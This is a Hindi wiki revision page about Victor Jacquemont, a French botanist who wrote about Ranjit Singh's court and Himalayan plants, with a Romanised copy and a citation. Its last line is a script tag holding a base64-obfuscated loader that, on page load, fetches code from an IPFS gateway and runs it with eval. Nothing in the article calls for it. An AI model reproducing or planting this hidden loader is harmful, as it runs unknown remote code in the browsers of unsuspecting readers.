Difference between revisions of "विक्टर जैकोमाण्ट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''विक्टर जैकोमाण्ट''' (अंग्रेज़ी: ''Victor Jacquemont'', जन्म: 1801 - मृ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 +
[[चित्र:Victor-Jacquemont.jpg|thumb|विक्टर जैकोमाण्ट]]
 
'''विक्टर जैकोमाण्ट''' ([[अंग्रेज़ी]]: ''Victor Jacquemont'', जन्म: 1801 - मृत्यु: 1832) एक फ्रेंच वनस्पतिशास्त्री था, जो लगभग 1830 ई. में [[पंजाब]] में [[रणजीत सिंह ]] के दरबार में आया। उसने 'भारत से पत्र' नामक पुस्तक में 'शेरे-पंजाब' के सम्बंध में अपने विचार लिखे हैं। वह रणजीत सिंह की जिज्ञासु वृत्ति से बहुत प्रभावित हुआ था और उसे 'एक असाधारण व्यक्ति' मानता था। उसके लिखे ग्रंथों में [[हिमालय]] क्षेत्र के पेड़-पौधों तथा उस काल के [[भारत]] की सामाजिक अवस्था के बारे में महत्त्वपूर्ण जानकारी मिलती है।<ref> पुस्तक- भारतीय इतिहास कोश |लेखक- सच्चिदानन्द भट्टाचार्य | पृष्ट संख्या- 167 | प्रकाशन- उत्तर प्रदेश हिन्दी संस्थान लखनऊ </ref>
 
'''विक्टर जैकोमाण्ट''' ([[अंग्रेज़ी]]: ''Victor Jacquemont'', जन्म: 1801 - मृत्यु: 1832) एक फ्रेंच वनस्पतिशास्त्री था, जो लगभग 1830 ई. में [[पंजाब]] में [[रणजीत सिंह ]] के दरबार में आया। उसने 'भारत से पत्र' नामक पुस्तक में 'शेरे-पंजाब' के सम्बंध में अपने विचार लिखे हैं। वह रणजीत सिंह की जिज्ञासु वृत्ति से बहुत प्रभावित हुआ था और उसे 'एक असाधारण व्यक्ति' मानता था। उसके लिखे ग्रंथों में [[हिमालय]] क्षेत्र के पेड़-पौधों तथा उस काल के [[भारत]] की सामाजिक अवस्था के बारे में महत्त्वपूर्ण जानकारी मिलती है।<ref> पुस्तक- भारतीय इतिहास कोश |लेखक- सच्चिदानन्द भट्टाचार्य | पृष्ट संख्या- 167 | प्रकाशन- उत्तर प्रदेश हिन्दी संस्थान लखनऊ </ref>
  

Revision as of 11:30, 20 January 2015

thumb|viktar jaikomant viktar jaikomant (aangrezi: Victor Jacquemont, janm: 1801 - mrityu: 1832) ek phreanch vanaspatishastri tha, jo lagabhag 1830 ee. mean panjab mean ranajit sianh ke darabar mean aya. usane 'bharat se patr' namak pustak mean 'shere-panjab' ke sambandh mean apane vichar likhe haian. vah ranajit sianh ki jijnasu vritti se bahut prabhavit hua tha aur use 'ek asadharan vyakti' manata tha. usake likhe granthoan mean himalay kshetr ke pe d-paudhoan tatha us kal ke bharat ki samajik avastha ke bare mean mahattvapoorn janakari milati hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. pustak- bharatiy itihas kosh |lekhak- sachchidanand bhattachary | prisht sankhya- 167 | prakashan- uttar pradesh hindi sansthan lakhanoo

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>